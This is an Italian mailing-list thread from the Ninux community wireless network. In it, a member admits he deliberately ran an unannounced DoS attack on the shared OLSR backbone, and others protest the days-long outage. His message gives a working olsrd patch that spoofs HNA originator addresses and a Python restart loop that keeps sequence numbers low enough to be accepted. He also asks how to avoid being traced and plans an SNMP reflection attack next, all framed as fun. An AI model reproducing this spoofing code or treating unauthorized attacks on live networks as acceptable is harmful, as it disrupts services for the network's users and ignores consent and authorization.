<p dir="ltr">Ciao<br>
Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi e comportamenti che da una settimana stanno invalidando sia il rispetto reciproco sia il buon finzionamento della rete stessa da parte di Saverio Proto.</p>

<div class="gmail_quote">Il 25/mag/2014 09:07 "Alessandro Gnagni" <<a href="mailto:alessandro@gnagni.it">alessandro@gnagni.it</a>> ha scritto:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
<p dir="ltr">Non è qualche ora. Va avanti da giovedì mattina.<br>
Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...<br>
Jabber è stato ko da giovedì per sta cosa. </p>
<div class="gmail_quote">Il 25/mag/2014 01:03 "Saverio Proto" <<a href="mailto:zioproto@gmail.com" target="_blank">zioproto@gmail.com</a>> ha scritto:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">

Ciao,<br>
<br>
Metto in Cc: anche <a href="mailto:wireless@ml.ninux.org" target="_blank">wireless@ml.ninux.org</a> perché questa email contiene<br>
informazioni tecniche interessanti.<br>
<br>
bravi, avete risolto il problema in fretta :) Ho volutamente provato<br>
un attacco DoS sul backbone per capire che effetto poteva avere.<br>
<br>
ecco la patch di olsrd con cui generavo l'attacco DoS<br>
<br>
diff --git a/src/build_msg.c b/src/build_msg.c<br>
index 109f955..e252981 100644<br>
--- a/src/build_msg.c<br>
+++ b/src/build_msg.c<br>
@@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)<br>
   m = (union olsr_message *)msg_buffer;<br>
<br>
   /* Fill header */<br>
-  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;<br>
+  struct in_addr fakesource;<br>
+  fakesource.s_addr = 0;<br>
+  //inet_hton(2956867021,&fakesource);<br>
+  inet_aton("172.16.40.40",&fakesource);<br>
+  m->v4.originator = fakesource.s_addr;<br>
   m->v4.hopcnt = 0;<br>
   m->v4.ttl = MAX_TTL;<br>
   m->v4.olsr_msgtype = HNA_MESSAGE;<br>
<br>
<br>
una domanda,<br>
<br>
se avessi patchato anche:<br>
<br>
m->v4.hopcnt = XXX<br>
<br>
mettendo numeri casuali..<br>
<br>
sarebbe stato altrettanto facile capire chi è che iniettava questi messaggi ?<br>
<br>
mi sto divertendo parecchio con questi attacchi DoS, sono molto<br>
istruttivi. Per chi vuole giocare insieme a me a programmare in C<br>
possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo<br>
che vorrei provare è DrDoS su snmp).<br>
<br>
un problema di questo attacco sono cmq i sequence number. Per rendere<br>
l'attacco efficace ho dovuto far andare la mia instanza patchata di<br>
OLSR a singhiozzo:<br>
<br>
import os<br>
import time<br>
<br>
while True:<br>
        os.system("olsrd")<br>
        print "started\n"<br>
        time.sleep(120)<br>
        os.system("killall olsrd")<br>
        print "killed\n"<br>
        time.sleep(300)<br>
<br>
in quanto avevo bisogno che i miei sequence number dovevano sempre<br>
essere piu bassi di quelli del spoofato, altrimenti venivano scartati<br>
come out of sequence.<br>
<br>
vi va di scrivere insieme un articoletto per il blog ? Io scrivo la<br>
parte di come ti costruisce l'attacco e voi la parte di come avete<br>
fatto ad identificare il nodo spoofato ?<br>
<br>
ho staccatto il nodo attaccante, il gioco è finito :)<br>
<br>
ah... vi prego nessun malumore per qualche oretta di disservizi, this<br>
is Ninux. Si fanno queste cose perché ci si diverte insieme.<br>
<br>
ciao :)<br>
<br>
Saverio<br>
<br>
Il 24 maggio 2014 23:23, Andrea Pescetelli<br>
<<a href="mailto:andrea.pescetelli@gmail.com" target="_blank">andrea.pescetelli@gmail.com</a>> ha scritto:<br>
> Saverio,<br>
> Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr hna<br>
> con originator 172.16.40.40, validity time 570, hna <a href="http://176.62.53.192/28" target="_blank">176.62.53.192/28</a><br>
> proveniente dal nodo in oggetto.<br>
><br>
> Questo problema sta oscurando diversi servizi di ninux in farm appartenenti<br>
> a quella subnet.<br>
><br>
> Abbiamo triangolato la posizione basandoci sugli hop count dei cammini<br>
> multipli.<br>
> puoi verificare?<br>
><br>
> Grazie<br>
><br>
> Fish, Hispanico, Halino<br>
> --<br>
> Andrea Pescetelli aka Fish<br>
> Skype: andrea5742<br>
> Ninux int: 5001/5002<br>
> Mobile: <a href="tel:%2B39%203891156050" value="+393891156050" target="_blank">+39 3891156050</a><br>
><br>
><br>
><br>
><br>
</blockquote></div>
<br>_______________________________________________<br>
Wireless mailing list<br>
<a href="mailto:Wireless@ml.ninux.org">Wireless@ml.ninux.org</a><br>
<a href="http://ml.ninux.org/mailman/listinfo/wireless" target="_blank">http://ml.ninux.org/mailman/listinfo/wireless</a><br>
<br></blockquote></div>